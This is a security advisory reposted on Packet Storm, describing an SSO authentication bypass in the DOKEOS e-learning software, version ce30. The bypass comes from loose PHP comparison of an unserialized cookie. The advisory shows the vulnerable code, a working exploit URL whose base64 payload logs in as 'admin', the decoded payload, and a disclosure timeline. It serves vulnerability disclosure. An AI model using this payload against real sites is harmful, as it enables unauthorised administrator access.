what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DOKEOS ce30 Authentication Bypass

DOKEOS ce30 Authentication Bypass
Posted Feb 18, 2016
Authored by High-Tech Bridge SA | Site htbridge.com

DOKEOS version ce30 suffers from an authentication bypass vulnerability.

tags | exploit, bypass
SHA-256 | e0d80f4d11e0f37a08bd45c5adf3616f68bc949b8f350966e67ed9a9b99c6a86

DOKEOS ce30 Authentication Bypass

Change Mirror Download
Advisory ID: HTB23289
Product: DOKEOS
Vendor: DOKEOS
Vulnerable Version(s): ce30 and probably prior
Tested Version: ce30
Advisory Publication: January 7, 2016 [without technical details]
Vendor Notification: January 7, 2016
Public Disclosure: February 17, 2016
Vulnerability Type: Improper Authentication [CWE-287]
Risk Level: High
CVSSv3 Base Score: 7.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a high-risk vulnerability in a popular e-learning software DOKEOS. A remote unauthenticated attacker can bypass authentication process and login to the vulnerable website with an arbitrary account (including administrator's one). Successful exploitation requires Single Sign-On (SSO) authentication to be enabled.

The vulnerability is caused by variable type confusion error when comparing password hash to unserialized string during authentication process, when SSO authentication is enabled (sso_authentication=true). In this case, the application uses HTTP GET "sso_cookie" parameter to pass base64-encoded login and password and then calls 'unserialize()' PHP function on received data.

Below is an example of vulnerable code, which erroneously uses the "==" operator to compare two strings (instead of the "===" operator):

if ($sso['secret'] == sha1($uData['password']) && ($sso['username'] == $uData['username'])) {


In this case, SHA1 password hash is compared to $sso['secret'] string, controlled by the attacker. If attacker passes Boolean true instead of the real password, he can successfully bypass the authentication and login under arbitrary web application account.

A simple exploit below can be used to authenticate under "admin" account:

http://[host]/index.php?loginFailed=1&sso_referer=&sso_cookie=YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=


The "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=" string is translated from base64 into:

a:2:{s:8:"username";s:5:"admin";s:6:"secret";b:1;}


After the execution of 'unserialize()' function, we have the following array:

$sso['username'] = 'admin';
$sso['secret'] = true;




-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2016-01-07 Vendor notified via contact form, no reply.
2016-01-13 Vendor notified via contact form, emails and twitter, no reply.
2016-01-20 Vendor notified via contact form and emails, no reply.
2016-01-27 Fix Requested via contact form and emails, no reply.
2016-02-03 Fix Requested via contact form and emails, no reply.
2016-02-17 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23289 - https://www.htbridge.com/advisory/HTB23289 - SSO Auth Bypass and Website Takeover in DOKEOS
[2] DOKEOS - http://www.dokeos.com/ - E-LEARNING suite and LMS for growing companies
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close